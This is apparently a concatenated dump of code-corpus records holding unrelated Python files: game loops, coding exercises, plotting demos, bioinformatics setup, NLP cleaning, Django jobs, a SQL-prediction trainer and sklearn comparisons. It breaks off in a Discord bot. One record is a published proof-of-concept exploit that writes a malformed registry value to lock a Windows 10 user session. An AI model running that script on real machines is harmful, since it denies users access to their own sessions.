game_master.choose_territories()\n player = 0\n while not game_master.ended:\n game_master.player_take_turn(player)\n game_master.call_end_turn_callbacks()\n player = (player + 1) % game_master.number_of_players()\n risk.logger.debug('User quit the game!') \n\nif __name__ == '__main__':\n settings = app_setup()\n risk.logger.debug(settings)\n master = game_setup(settings)\n run_game(master)\n","sub_path":"risk.py","file_name":"risk.py","file_ext":"py","file_size_in_byte":1790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"167491233","text":"'''\n1071 : [기초-반복실행구조] 0 입력될 때까지 무한 출력하기1(설명)\n정수가 순서대로 입력된다.\n-2147483648 ~ +2147483647, 단 개수는 알 수 없다.\n\n0이 아니면 입력된 정수를 출력하고, 0이 입력되면 출력을 중단해보자.\nwhile( ), for( ), do~while( ) 등의 반복문을 사용할 수 없다.\n'''\nlist = input().split()\n\nfor x in list:\n if(int(x)==0):\n break;\n else:\n print(int(x))\n","sub_path":"codeUp/codeUp100/1071.py","file_name":"1071.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"484458086","text":"#This example implements a 5 invader SDMI game with a Brute force Capture order\r\nimport sdmiFuncLib as sfl\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\n#Invader Locations\r\n\r\n#I0 => [-12.25709932 4.44973388]\r\n#I1 => [ -6.6489077 21.23919568]\r\n#I2 => [ 0.41996017 24.16072049]\r\n#I3 => [ 8.51769598 11.40288417]\r\n\r\nI_array = [[-12.25709932, 4.44973388],\r\n [ -6.6489077, 21.23919568],\r\n [ 0.41996017, 24.16072049],\r\n [ 8.51769598, 11.40288417],\r\n [ -6.6489077, 24.16072049]]\r\n\r\n## Game Properties\r\n\r\nr =0 #Capture range\r\nalpha = 4 #Speed ratio\r\nDefender = [0,0] #Defender Position\r\nG_circ = [0, -8, 8] #Target Region Properties\r\n\r\n## Compute Capture order With Enumeration\r\nbestOrder,_,meanVect, StdData,_ = sfl.computeBestOrderEnum(I_array, r, alpha, Defender, G_circ,eMethod=0)\r\nprint(\"Capture Order: \", bestOrder)\r\nprint(\"Number of Computations\", sfl.NumeralCounter)\r\nI_dict,_ = sfl.createInvDict(I_array)\r\n\r\n## Plot Trial\r\nfig, axs = plt.subplots()\r\nTotEff, P_star, T = sfl.plotTrial(Defender, I_dict, bestOrder, G_circ, alpha, r, axisSz=[-10,10,-5,10], plotFlag=1, T = 0, effMethod = 0, plt=axs)\r\n\r\nFL_score = sfl.flightPathScore(P_star, Defender)\r\nNumInTarget_score = sfl.numInTarget(P_star, G_circ, bestOrder, I_dict)\r\n\r\nprint('Effeciency Score: ', TotEff)\r\nprint('Flight Path Score: ', FL_score)\r\nprint('Number of Invaders Captured: ', len(I_array ) - NumInTarget_score)\r\n\r\naxs.set_aspect('equal', adjustable='datalim')\r\nplt.show()\r\n","sub_path":"Examples/plot_SDMI_Enumeration_Order_Example.py","file_name":"plot_SDMI_Enumeration_Order_Example.py","file_ext":"py","file_size_in_byte":1514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"383229491","text":"#!python3\r\n# 2013-Jan-21 Mon 07:15\r\nimport turtle, random, time\r\n\r\ndef turtle_cubic_bezier(p0,p1,p2,p3, n=1000*50):\r\n\r\n x0, y0 = p0[0], p0[1]\r\n x1, y1 = p1[0], p1[1]\r\n x2, y2 = p2[0], p2[1]\r\n x3, y3 = p3[0], p3[1]\r\n turtle.penup()\r\n turtle.goto(x0,y0)\r\n turtle.pendown()\r\n for i in range(n+1):\r\n t = i / n\r\n a = (1. - t)**3\r\n b = 3. * t * (1. - t)**2\r\n c = 3.0 * t**2 * (1.0 - t)\r\n d = t**3\r\n \r\n x = int(a * x0 + b * x1 + c * x2 + d * x3)\r\n y = int(a * y0 + b * y1 + c * y2 + d * y3)\r\n turtle.goto(x,y)\r\n turtle.goto(x3,y3)\r\n\r\ndef r01(): return random.random()\r\ndef r(): return int(r01()*200-100)\r\ndef rr(): return(r(),r())\r\ndef rmid(x1,x2): return int(x1+x2+r()/2)/2\r\n\r\ndef add_point(x, y):\r\n try:\r\n add_point.new_points.append([x,y])\r\n except AttributeError:\r\n add_point.new_points = [[x,y]]\r\n print(add_point.new_points)\r\n print(\"Mouse click\")\r\n if len(add_point.new_points) >= 4:\r\n turtle_cubic_bezier(*add_point.new_points)\r\n add_point.new_points = []\r\n\r\ndef clearScreen(x ,y):\r\n print(\"please clear\")\r\n turtle.getscreen().clear()\r\n\r\n\r\n\r\n\r\ndef random_color():\r\n def t(i): return time.clock() * i % 1\r\n rbg = [t(1), t(3), t(5)]\r\n print(\"rbg=(%3.2f,%3.2f,%3.2f)\" % (rbg[0],rbg[1],rbg[2]))\r\n turtle.color(*rbg)\r\n\r\ndef main():\r\n #turtle.ht()\r\n\r\n turtle.speed(0)\r\n turtle.delay(0)\r\n turtle.colormode(1.)\r\n\r\n turtle.onscreenclick(add_point)\r\n turtle.onscreenclick(clearScreen, btn=2)\r\n turtle.done()\r\n\r\n \r\n \r\nif __name__ == \"__main__\":\r\n main() ","sub_path":"turtle/bezier.py","file_name":"bezier.py","file_ext":"py","file_size_in_byte":1615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"606050728","text":"# def divison(x,y):\n# try:\n# print (x/y)\n# except Exception :\n# print (f'exception occured {Exception}')\n# finally:\n# print('end')\n\n# divison(10,0)\n\nprint('some data')\ndef list_enumerate(list):\n for i, val in enumerate(list):\n print(f'index : {i} and value : {val}')\n\nlist_enumerate([2,4,6,8])\n","sub_path":"ExceptionHandling/Try.py","file_name":"Try.py","file_ext":"py","file_size_in_byte":340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"5716274","text":"#!/usr/bin/env python\n#\n# Exploit Title: Windows 10 User Session Stuck\n# Date: 2018-10-19\n# Exploit Author: Fabien DROMAS - Security consultant @ Synetis \n# Twitter: st0rnpentest\n#\n# Vendor Homepage: www.microsoft.com\n# Version: Version 10.0.17134.345\n# Tested on: Windows 10 pro Version 10.0.17134.345\n#\nimport _winreg\n\n\ndef modify_reg_key(key, value):\n try: \n registry_key = _winreg.OpenKey(_winreg.HKEY_CURRENT_USER, 'Control Panel\\Desktop\\LanguageConfiguration', 0, _winreg.KEY_WRITE) \n _winreg.SetValueEx(registry_key, key, 0, _winreg.REG_SZ, value) \n _winreg.CloseKey(registry_key)\n except WindowsError: \n raise\n \n\nif __name__ == '__main__':\n\n try:\n modify_reg_key('', '') \n except WindowsError:\n raise \n","sub_path":"userSession_stuck.py","file_name":"userSession_stuck.py","file_ext":"py","file_size_in_byte":844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"275599071","text":"\n\"\"\"Enumerating the subtypes of a gene in a cohort to be isolated.\n\n\"\"\"\n\nimport os\nbase_dir = os.path.dirname(__file__)\n\nimport sys\nsys.path.extend([os.path.join(base_dir, '../../..')])\n\nfrom HetMan.features.cohorts.tcga import MutationCohort\nimport argparse\nimport synapseclient\nimport dill as pickle\n\nfirehose_dir = \"/home/exacloud/lustre1/share_your_data_here/precepts/firehose\"\n\n\ndef main():\n parser = argparse.ArgumentParser(\n \"Set up the gene subtype expression effect isolation experiment by \"\n \"enumerating the subtypes to be tested.\"\n )\n\n # create positional command line arguments\n parser.add_argument('cohort', type=str, help=\"which TCGA cohort to use\")\n parser.add_argument('gene', type=str, help=\"which gene to consider\")\n parser.add_argument('mut_levels', type=str,\n help=\"the mutation property levels to consider\")\n\n # create optional command line arguments\n parser.add_argument('--samp_cutoff', type=int, default=20,\n help='subtype sample frequency threshold')\n parser.add_argument('--verbose', '-v', action='store_true',\n help='turns on diagnostic messages')\n\n # parse command line arguments, create directory where found subtypes\n # will be stored\n args = parser.parse_args()\n use_lvls = args.mut_levels.split('__')\n out_path = os.path.join(base_dir, 'setup', args.cohort, args.gene)\n os.makedirs(out_path, exist_ok=True)\n\n # log into Synapse using locally stored credentials\n syn = synapseclient.Synapse()\n syn.cache.cache_root_dir = (\"/home/exacloud/lustre1/CompBio/\"\n \"mgrzad/input-data/synapse\")\n syn.login()\n\n # load expression and variant call data for the given TCGA cohort\n cdata = MutationCohort(\n cohort=args.cohort, mut_genes=[args.gene], mut_levels=use_lvls,\n expr_source='Firehose', var_source='mc3', expr_dir=firehose_dir,\n cv_prop=1.0, syn=syn\n )\n\n if args.verbose:\n print(\"Looking for combinations of subtypes of mutations in gene {} \"\n \"present in at least {} of the samples in TCGA cohort {} at \"\n \"annotation levels {}.\\n\".format(\n args.gene, args.samp_cutoff, args.cohort, use_lvls)\n )\n\n # find mutation subtypes present in enough samples in the TCGA cohort\n iso_mtypes = cdata.train_mut.find_unique_subtypes(\n max_types=1000, max_combs=5, verbose=2,\n sub_levels=use_lvls, min_type_size=args.samp_cutoff\n )\n\n # filter out the subtypes that appear in too many samples for there to\n # be a wild-type class of sufficient size for classification\n use_mtypes = {mtype for mtype in iso_mtypes\n if (len(mtype.get_samples(cdata.train_mut))\n <= (len(cdata.samples) - args.samp_cutoff))}\n\n if args.verbose:\n print(\"\\nFound {} total sub-types to isolate!\".format(\n len(use_mtypes)))\n\n # save the list of found non-duplicate subtypes to file\n pickle.dump(\n sorted(use_mtypes),\n open(os.path.join(out_path,\n 'mtypes_list__samps_{}__levels_{}.p'.format(\n args.samp_cutoff, args.mut_levels)),\n 'wb')\n )\n\n # save the number of found subtypes to file\n with open(os.path.join(out_path,\n 'mtypes_count__samps_{}__levels_{}.txt'.format(\n args.samp_cutoff, args.mut_levels)),\n 'w') as fl:\n\n fl.write(str(len(use_mtypes)))\n\n\nif __name__ == '__main__':\n main()\n\n","sub_path":"HetMan/experiments/subvariant_isolate/setup_isolate.py","file_name":"setup_isolate.py","file_ext":"py","file_size_in_byte":3624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"196885655","text":"import pickle\r\nimport gensim\r\nfrom gensim import corpora\r\nimport pynlpir\r\nimport os\r\nfrom sklearn.utils import Bunch\r\n\r\ndef initbunch(bunch):\r\n bunch.target_name=[]\r\n bunch.label=[]\r\n bunch.filenames=[]\r\n bunch.contents=[]\r\n\r\ndef clean(raw_data_input_path, word_bag_filepath):\r\n '''\r\n 函数说明: 对下载的源新闻文档进行分词处理,并且从分词结果中仅取名词\r\n :param raw_data_input_path: 源文档根目录\r\n :param word_bag_filepath: 将清洗的结果bunch持久化到词袋文件\r\n :return: \r\n '''\r\n bunch = Bunch(target_name=[], label=[], filenames=[], contents=[])\r\n catagorys = os.listdir(raw_data_input_path)\r\n bunch.target_name.extend(catagorys)\r\n pynlpir.open()\r\n head = 'F:\\data'\r\n finished = ['体育', '台湾']\r\n for catagory in catagorys:\r\n if( catagory in finished ):\r\n continue\r\n initbunch(bunch)\r\n catagory_path = os.path.join(raw_data_input_path, catagory)\r\n years = os.listdir(catagory_path)\r\n for year in years:\r\n year_path = os.path.join(head,catagory,year)\r\n months = os.listdir(year_path)\r\n for month in months:\r\n print(\"cleaning \" + catagory + \" month: \" + month)\r\n month_path = os.path.join(year_path, month)\r\n raw_documents = os.listdir(month_path)\r\n for document in raw_documents:\r\n document_path = os.path.join(month_path, document)\r\n # 对每篇文章进行分词处理\r\n f = open(document_path, 'r')\r\n p = f.read()\r\n try:\r\n segments = pynlpir.segment(p, pos_english=True)\r\n except UnicodeDecodeError:\r\n print(catagory + ' ' + document + ' UnicodeDecodeError')\r\n # 对分词结果取名词\r\n seg_only_noun = [element[0] for element in segments if element[1] == 'noun']\r\n document_cleaned = ' '.join(seg_only_noun)\r\n bunch.filenames.append(document)\r\n bunch.label.append(catagory)\r\n bunch.contents.append(document_cleaned)\r\n f = open(word_bag_filepath + catagory + '.dat', 'wb')\r\n pickle.dump(bunch, f)\r\n pynlpir.close()\r\n\r\nif __name__ == '__main__':\r\n # 清洗模块测试\r\n # 训练集\r\n print(\"正在清洗训练集数据\")\r\n train_data_path = 'F:\\\\train'\r\n train_word_bag = 'F:\\\\results\\\\train_word_bag_'\r\n # clean(train_data_path, train_word_bag)\r\n\r\n #测试集\r\n print(\"正在清理测试集数据\")\r\n test_data_path = 'F:\\\\test'\r\n test_word_bag = 'F:\\\\results\\\\test_word_bag_'\r\n # clean(test_data_path, test_word_bag)\r\n\r\n #LDA Sample\r\n print(\"LDA Sample\")\r\n word_bag_filepath = \"F:\\\\result\\\\train_word_bag.dat\"\r\n # 读取bunch\r\n with open(word_bag_filepath, \"rb\") as file_obj:\r\n bunch = pickle.load(file_obj)\r\n # print(bunch.target_name)\r\n # for t in bunch.contents:\r\n # print(t)\r\n word = [doc.split(',') for doc in bunch.contents]\r\n dictionary = corpora.Dictionary(word)\r\n doc_term_matrix = [dictionary.doc2bow(doc) for doc in word]\r\n # for t in doc_term_matrix:\r\n # print(t)\r\n Lda = gensim.models.ldamodel.LdaModel\r\n ldamodel = Lda(doc_term_matrix, num_topics=4, id2word=dictionary, passes=100)\r\n print(ldamodel.print_topics(num_topics=4, num_words=50))","sub_path":"TextClassification/clean/clean.py","file_name":"clean.py","file_ext":"py","file_size_in_byte":3493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"518648814","text":"from django.core.mail import send_mail\nfrom django.utils import timezone\n\nfrom instructions.models import Instruction, InstructionReminder\nfrom instructions.model_choices import INSTRUCTION_STATUS_NEW, INSTRUCTION_STATUS_PROGRESS\nfrom accounts.models import User, PracticePreferences, GeneralPracticeUser\nfrom common.functions import get_env_variable\n\nfrom smtplib import SMTPException\nimport logging\n\nfrom django.conf import settings\nPIPELINE_INSTRUCTION_LINK = settings.PIPELINE_INSTRUCTION_LINK\n\n\ndef instruction_notification_email_job():\n now = timezone.now()\n new_or_pending_instructions = Instruction.objects.filter(\n status__in=(INSTRUCTION_STATUS_NEW, INSTRUCTION_STATUS_PROGRESS), gp_practice_type__model='organisationgeneralpractice'\n )\n\n for instruction in new_or_pending_instructions:\n diff_date = now - instruction.created\n if diff_date.days == 3 or diff_date.days == 7 or diff_date.days >= 14:\n gp_managers = User.objects.filter(\n userprofilebase__generalpracticeuser__organisation=instruction.gp_practice_id,\n userprofilebase__generalpracticeuser__role=GeneralPracticeUser.PRACTICE_MANAGER\n ).values('email')\n try:\n send_mail(\n 'Pending Instruction',\n 'You have a pending or not started instruction. Click here {link} to see it.'.format(link=PIPELINE_INSTRUCTION_LINK),\n 'MediData',\n [gp['email'] for gp in gp_managers],\n fail_silently=True,\n auth_user=settings.EMAIL_HOST_USER,\n auth_password=settings.EMAIL_HOST_PASSWORD,\n )\n if instruction.gp_practice and instruction.gp_practice.organisation_email:\n send_mail(\n 'Pending Instruction',\n 'You have a pending or not started instruction.',\n 'MediData',\n [instruction.gp_practice.organisation_email],\n fail_silently=True,\n auth_user=settings.EMAIL_HOST_USER,\n auth_password=settings.EMAIL_HOST_PASSWORD,\n )\n InstructionReminder.objects.create(\n instruction_id=instruction.id,\n note=\"note added to instruction for %s day reminder\"%diff_date.days,\n reminder_day=diff_date.days\n )\n except SMTPException:\n logging.error('Send mail FAILED to send message')\n\n\ndef send_email_to_practice_job():\n unstarted_instructions = Instruction.objects.filter(status=INSTRUCTION_STATUS_NEW, gp_practice_type__model='organisationgeneralpractice')\n for instruction in unstarted_instructions:\n gp_practice = instruction.gp_practice\n practice_preferences = PracticePreferences.objects.get(gp_organisation=gp_practice)\n if practice_preferences.notification == 'DIGEST':\n send_mail(\n 'Unstarted Instruction',\n 'You have unstarted instructions. Click here {link} to see it.'.format(link=PIPELINE_INSTRUCTION_LINK),\n 'MediData',\n [gp_practice.organisation_email],\n fail_silently=True,\n auth_user=settings.EMAIL_HOST_USER,\n auth_password=settings.EMAIL_HOST_PASSWORD,\n )\n","sub_path":"instructions/cron/notification_mail.py","file_name":"notification_mail.py","file_ext":"py","file_size_in_byte":3447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"98178476","text":"# -*- coding: utf-8 -*- \n\nfrom django.db import models\nfrom django.contrib.auth.models import User\nfrom datetime import datetime\n\nclass ItemAgenda(models.Model):\n\tdata = models.DateField()\n\thora = models.TimeField()\n\ttitulo = models.CharField(max_length=100)\n\tdescricao = models.TextField()\n\tusuario = models.ForeignKey(User, related_name='item_usuario', null=True, blank=True)\n\tparticipantes = models.ManyToManyField(User, related_name='item_participantes')\n\nclass Meta:\n\tdb_table = \"tbl_itens_da_agenda\"\n\nclass PessoaFisica(models.Model):\n\tcpf = models.CharField(max_length=11, primary_key=True)","sub_path":"Agenda/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"567424686","text":"from models import User\nfrom app import remind\n\n\n# Проверить данные о времени\ndef check_user_time():\n # Получить user id для напомининя\n user = User()\n id_list = user.get_user_id_for_remind()\n \n if len(id_list) == 0:\n return\n \n # Отправить пользователям сообщение-напоминание\n for id in id_list:\n remind(str(id))\n \n id_list.clear()\n\n\n\n","sub_path":"reminder.py","file_name":"reminder.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"290456113","text":"import json\nimport torch\nimport datetime\nimport argparse\nimport numpy as np\nfrom utils import *\n# from model.sqlnet import SQLNet\nfrom word_embedding import WordEmbedding\n# from models import MultiSqlPredictor,KeyWordPredictor,ColPredictor,OpPredictor,RootTeminalPredictor,DesAscLimitPredictor,AggPredictor\nfrom models.agg_predictor import AggPredictor\nfrom models.col_predictor import ColPredictor\nfrom models.desasc_limit_predictor import DesAscLimitPredictor\nfrom models.having_predictor import HavingPredictor\nfrom models.keyword_predictor import KeyWordPredictor\nfrom models.multisql_predictor import MultiSqlPredictor\nfrom models.op_predictor import OpPredictor\nfrom models.root_teminal_predictor import RootTeminalPredictor\n\nTRAIN_COMPONENTS = ('multi_sql','keyword','col','op','agg','root_tem','des_asc','having')\nSQL_TOK = ['', '', 'WHERE', 'AND', 'EQL', 'GT', 'LT', '']\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--toy', action='store_true',\n help='If set, use small data; used for fast debugging.')\n parser.add_argument('--suffix', type=str, default='',\n help='The suffix at the end of saved model name.')\n parser.add_argument('--sd', type=str, default='',\n help='set model save directory.')\n parser.add_argument('--dataset', type=int, default=0,\n help='0: original dataset, 1: re-split dataset, 2: new complex dataset')\n parser.add_argument('--train_emb', action='store_true',\n help='Train word embedding.')\n parser.add_argument('--train_component',type=str,default='',\n help='set train components,available:[multi_sql,keyword,col,op,agg,root_tem,des_asc,having]')\n parser.add_argument('--epoch',type=int,default=500,\n help='number of epoch for training')\n args = parser.parse_args()\n\n N_word=300\n B_word=42\n N_h = 300\n N_depth=2\n if args.toy:\n USE_SMALL=True\n GPU=True\n BATCH_SIZE=20\n else:\n USE_SMALL=False\n GPU=True\n BATCH_SIZE=64\n # TRAIN_ENTRY=(False, True, False) # (AGG, SEL, COND)\n # TRAIN_AGG, TRAIN_SEL, TRAIN_COND = TRAIN_ENTRY\n learning_rate = 1e-4\n if args.train_component not in TRAIN_COMPONENTS:\n print(\"Invalid train component\")\n exit(1)\n train_data = load_train_dev_dataset(args.train_component,\"train\")\n dev_data = load_train_dev_dataset(args.train_component, \"dev\")\n # sql_data, table_data, val_sql_data, val_table_data, \\\n # test_sql_data, test_table_data, \\\n # TRAIN_DB, DEV_DB, TEST_DB = load_dataset(args.dataset, use_small=USE_SMALL)\n\n word_emb = load_word_emb('glove/glove.%dB.%dd.txt'%(B_word,N_word), \\\n load_used=args.train_emb, use_small=USE_SMALL)\n print(\"finished load word embedding\")\n #word_emb = load_concat_wemb('glove/glove.42B.300d.txt', \"/data/projects/paraphrase/generation/para-nmt-50m/data/paragram_sl999_czeng.txt\")\n model = None\n if args.train_component == \"multi_sql\":\n model = MultiSqlPredictor(N_word=N_word,N_h=N_h,N_depth=N_depth,gpu=GPU)\n elif args.train_component == \"keyword\":\n model = KeyWordPredictor(N_word=N_word,N_h=N_h,N_depth=N_depth,gpu=GPU)\n elif args.train_component == \"col\":\n model = ColPredictor(N_word=N_word,N_h=N_h,N_depth=N_depth,gpu=GPU)\n elif args.train_component == \"op\":\n model = OpPredictor(N_word=N_word,N_h=N_h,N_depth=N_depth,gpu=GPU)\n elif args.train_component == \"agg\":\n model = AggPredictor(N_word=N_word,N_h=N_h,N_depth=N_depth,gpu=GPU)\n elif args.train_component == \"root_tem\":\n model = RootTeminalPredictor(N_word=N_word,N_h=N_h,N_depth=N_depth,gpu=GPU)\n elif args.train_component == \"des_asc\":\n model = DesAscLimitPredictor(N_word=N_word,N_h=N_h,N_depth=N_depth,gpu=GPU)\n elif args.train_component == \"having\":\n model = HavingPredictor(N_word=N_word,N_h=N_h,N_depth=N_depth,gpu=GPU)\n # model = SQLNet(word_emb, N_word=N_word, gpu=GPU, trainable_emb=args.train_emb)\n optimizer = torch.optim.Adam(model.parameters(), lr=learning_rate, weight_decay = 0)\n print(\"finished build model\")\n # agg_m, sel_m, cond_m = best_model_name(args)\n #\n # if args.train_emb: # Load pretrained model.\n # agg_lm, sel_lm, cond_lm = best_model_name(args, for_load=True)\n # print \"Loading from %s\"%agg_lm\n # model.agg_pred.load_state_dict(torch.load(agg_lm))\n # print \"Loading from %s\"%sel_lm\n # model.selcond_pred.load_state_dict(torch.load(sel_lm))\n # print \"Loading from %s\"%cond_lm\n # model.cond_pred.load_state_dict(torch.load(cond_lm))\n\n\n #initial accuracy\n # init_acc = epoch_acc(model, BATCH_SIZE, val_sql_data, val_table_data, TRAIN_ENTRY)\n # if TRAIN_AGG:\n # torch.save(model.agg_pred.state_dict(), agg_m)\n # if TRAIN_SEL:\n # torch.save(model.selcond_pred.state_dict(), sel_m)\n # if TRAIN_COND:\n # torch.save(model.op_str_pred.state_dict(), cond_m)\n\n print_flag = False\n embed_layer = WordEmbedding(word_emb, N_word, gpu=GPU,\n SQL_TOK=SQL_TOK, trainable=args.train_emb)\n print(\"start training\")\n best_acc = 0.0\n for i in range(args.epoch):\n print('Epoch %d @ %s'%(i+1, datetime.datetime.now()))\n print(' Loss = %s'%epoch_train(\n model, optimizer, BATCH_SIZE,args.train_component,embed_layer,train_data))\n acc = epoch_acc(model, BATCH_SIZE, args.train_component,embed_layer,dev_data)\n if acc > best_acc:\n best_acc = acc\n print(\"Save model...\")\n torch.save(model.state_dict(),\"saved_models/{}_models.dump\".format(args.train_component))\n # print '\\nTrain sel acc: %s, sel # acc: %s' % (train_bkd_acc[1], train_bkd_acc[0])\n #print ' Breakdown results: agg #: %s, agg: %s, sel: %s, cond: %s, sel #: %s, cond #: %s, cond col: %s, cond op: %s, cond val: %s, group #: %s, group: %s, order #: %s, order: %s, order agg: %s, order par: %s'\\\n # % (train_bkd_acc[0], train_bkd_acc[1], train_bkd_acc[2], train_bkd_acc[3], train_bkd_acc[4], train_bkd_acc[5], train_bkd_acc[6], train_bkd_acc[7], train_bkd_acc[8], train_bkd_acc[9], train_bkd_acc[10], train_bkd_acc[11], train_bkd_acc[12], train_bkd_acc[13], train_bkd_acc[14])\n # if i > 497:\n # print_flag = True\n # val_tot_acc, val_bkd_acc = epoch_acc(model, BATCH_SIZE, val_sql_data, val_table_data, TRAIN_ENTRY, error_print = print_flag, train_flag = False) #for detailed error analysis, pass True to error_print\n # print '\\nDev sel acc: %s, sel # acc: %s' % (val_bkd_acc[1], val_bkd_acc[0])\n #print ' Breakdown results: agg #: %s, agg: %s, sel: %s, cond: %s, sel #: %s, cond #: %s, cond col: %s, cond op: %s, cond val: %s, group #: %s, group: %s, order #: %s, order: %s, order agg: %s, order par: %s'\\\n # % (val_bkd_acc[0], val_bkd_acc[1], val_bkd_acc[2], val_bkd_acc[3], val_bkd_acc[4], val_bkd_acc[5], val_bkd_acc[6], val_bkd_acc[7], val_bkd_acc[8], val_bkd_acc[9], val_bkd_acc[10], val_bkd_acc[11], val_bkd_acc[12], val_bkd_acc[13], val_bkd_acc[14])\n\n","sub_path":"hierachical_col_emb_version/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":7177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"430820627","text":"\n\nimport matplotlib.pyplot as plt\nfrom prep_terrain_data import makeTerrainData\nfrom class_vis import prettyPicture\n\nfeatures_train, labels_train, features_test, labels_test = makeTerrainData()\n\n\n### the training data (features_train, labels_train) have both \"fast\" and \"slow\"\n### points mixed together--separate them so we can give them different colors\n### in the scatterplot and identify them visually\ngrade_fast = [features_train[ii][0] for ii in range(0, len(features_train)) if labels_train[ii]==0]\nbumpy_fast = [features_train[ii][1] for ii in range(0, len(features_train)) if labels_train[ii]==0]\ngrade_slow = [features_train[ii][0] for ii in range(0, len(features_train)) if labels_train[ii]==1]\nbumpy_slow = [features_train[ii][1] for ii in range(0, len(features_train)) if labels_train[ii]==1]\n\n#### initial visualization\nplt.xlim(0.0, 1.0)\nplt.ylim(0.0, 1.0)\nplt.scatter(bumpy_fast, grade_fast, color = \"b\", label=\"fast\")\nplt.scatter(grade_slow, bumpy_slow, color = \"r\", label=\"slow\")\nplt.legend()\nplt.xlabel(\"bumpiness\")\nplt.ylabel(\"grade\")\nplt.show()\n\n################################################################################\n\n### Decision tree \nfrom sklearn import tree\nfrom sklearn.metrics import accuracy_score\nclf = tree.DecisionTreeClassifier(min_samples_split=40)\nclf = clf.fit(features_train,labels_train)\npred = clf.predict(features_test)\nacc = accuracy_score(pred, labels_test)\nprint(acc)\n# -> 0.912\n\n# SVM\nfrom sklearn.svm import SVC\nfrom sklearn.metrics import accuracy_score\nclf = SVC(kernel='rbf',C=10000.)\nclf.fit(features_train, labels_train)\npred = clf.predict(features_test)\nacc = accuracy_score(pred,labels_test)\nprint(acc)\n# -> 0.932\n\n# AdaBoost Classifier \nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.ensemble import AdaBoostClassifier\nclf = AdaBoostClassifier(n_estimators=100)\nscores = cross_val_score(clf, features_train, labels_train)\nprint(scores.mean())\n# -> 0.9427\n\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.ensemble import ExtraTreesClassifier\nfrom sklearn.tree import DecisionTreeClassifier\n\nclf = DecisionTreeClassifier(max_depth=None, min_samples_split=2,random_state=0)\nscores = cross_val_score(clf, features_train, labels_train)\nprint(\"DecisionTreeClassifier: \")\nprint(scores.mean())\n# -> DecisionTreeClassifier: 0.945370133922\n\nclf = RandomForestClassifier(n_estimators=10, max_depth=None,min_samples_split=2, random_state=0)\nscores = cross_val_score(clf, features_train, labels_train)\nprint('RandomForestClassifier: ')\nprint(scores.mean())\n# -> RandomForestClassifier: 0.952031488504\n\nclf = ExtraTreesClassifier(n_estimators=10, max_depth=None,min_samples_split=2, random_state=0)\nscores = cross_val_score(clf, features_train, labels_train)\nprint('ExtraTreesClassifier: ')\nprint(scores.mean())\n# -> ExtraTreesClassifier: 0.94136477917\n\ntry:\n\tprettyPicture(clf, features_test, labels_test)\nexcept NameError:\n\tpass\n","sub_path":"Machine-Learning/algorithm_selection.py","file_name":"algorithm_selection.py","file_ext":"py","file_size_in_byte":2965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"265622253","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nProblem 6\r\nThe sum of the squares of the first ten natural numbers is,\r\n\r\n1^2 + 2^2 + ... + 10^2 = 385\r\nThe square of the sum of the first ten natural numbers is,\r\n\r\n(1 + 2 + ... + 10)2 = 552 = 3025\r\n\r\nHence the difference between the sum of the squares of the first ten natural\r\n numbers and the square of the sum is 3025 − 385 = 2640.\r\n\r\nFind the difference between the sum of the squares of the first one hundred \r\nnatural numbers and the square of the sum.\r\n\"\"\"\r\n\r\ndef sum_squares (n):\r\n i = 0\r\n sum = 0\r\n for i in range (1,n+1):\r\n sum = sum + i**2\r\n i += 1\r\n# print (i,sum, \"sum in for\")\r\n \r\n return sum\r\n \r\ndef square_sum (m):\r\n j = 0\r\n ssum = 0\r\n for j in range (1,m+1):\r\n ssum = ssum + j\r\n j += 1\r\n# print (j,ssum, \"square sum\")\r\n\r\n return (ssum**2)\r\n \r\n \r\ns_square = 100\r\na = sum_squares(s_square)\r\nb = square_sum(s_square)\r\nprint (\"sum of squares of \",s_square,\" is \", a)\r\nprint (\"the square of the sum of \", s_square, \" is \", b)\r\nprint (\"the difference is \", b - a )\r\n\r\n\r\n","sub_path":"Euler project no 6.py","file_name":"Euler project no 6.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"322517884","text":"import discord\nfrom discord.ext import commands\nimport sys, asyncio\nfrom utils.functions import (\n getMemberKillCounts,\n getFormattedMemberKillCounts,\n getAllianceName,\n getKillCount,\n getWarPointsChannel,\n getTotalKillCounts\n)\nfrom utils.db import incrementMemberKillCount, setWarPointsChannel #, resetWarPoints\nimport math as m\n\n\nclass WarCog(commands.Cog):\n \n def __init__(self, bot):\n self.bot = bot\n self.next = '\\N{BLACK RIGHTWARDS ARROW}'\n self.prev = '\\N{LEFTWARDS BLACK ARROW}'\n \n @commands.Cog.listener()\n async def on_message(self, message):\n\n channel = getWarPointsChannel(message.guild.id)\n if message.channel.name == channel and not message.author.bot and message.attachments:\n\n allianceId = ''\n name = ''\n test = 